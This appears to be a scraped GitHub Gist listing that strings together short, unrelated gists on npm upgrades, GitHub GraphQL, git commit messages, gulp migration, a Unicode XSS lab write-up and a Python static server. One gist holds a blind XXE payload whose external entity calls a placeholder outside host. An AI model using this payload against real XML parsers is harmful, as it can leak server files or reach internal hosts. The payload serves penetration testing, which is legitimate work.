- BA: BlackArch
- AL: ArchLinux
- SO: StackOverflow
- AL PKGBUILD guide: https://wiki.archlinux.org/index.php/PKGBUILD
- BA PKGBUILD templates: https://github.com/BlackArch/blackarch-pkgbuilds
Alexandre ZANNI noraj
💎
othiym23
/ npm-upgrade-bleeding.sh
Created
September 20, 2014 19:36
a safe way to upgrade all of your globally-installed npm packages
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| set -e | |
| set -x | |
| for package in $(npm -g outdated --parseable --depth=0 | cut -d: -f3) | |
| do | |
| npm -g install "$package" | |
| done |
MichaelCurrin
/ README.md
Last active
April 14, 2024 16:26
GitHub GraphQL - Get Pull Requests using GH's GraphQL API
How to get Pull Requests data using Github in the browser, or using the API to allow for automating reporting or building in values into a website.
- GitHub GQL API: https://developer.github.com/v4/
- Explorer: https://developer.github.com/v4/explorer/
- Github community topics - these were used to understand the syntax needed.
Moutard3
/ mp3-upload-direct-link.md
Last active
April 15, 2024 07:06
Tutorials / Walkthrough for uploading & getting direct link of sound file (mp3, ogg, ...)
Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.
Lab: https://4t64ubva.xssy.uk/
A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:
nepsilon
/ git-change-commit-messages.md
Last active
April 24, 2024 06:30
How to change your commit messages in Git? — First published in fullweb.io issue #55
At some point you’ll find yourself in a situation where you need edit a commit message. That commit might already be pushed or not, be the most recent or burried below 10 other commits, but fear not, git has your back 🙂.
git commit --amendThis will open your $EDITOR and let you change the message. Continue with your usual git push origin master.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
noraj
/ gulp-cjs-to-esm.md
Last active
May 6, 2024 09:01
Moving gulpfile from CommonJS (CJS) to ECMAScript Modules (ESM)
del v7.0.0 moved to pure ESM (no dual support), which forced me to move my gulpfile to ESM to be able to continue to use del.
The author sindresorhus maintains a lot of npm packages and does not want to provides an upgrade guide for each package so he provided a generic guide. But this guide is a bit vague because it's generic and not helping for gulp, hence this guide.
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000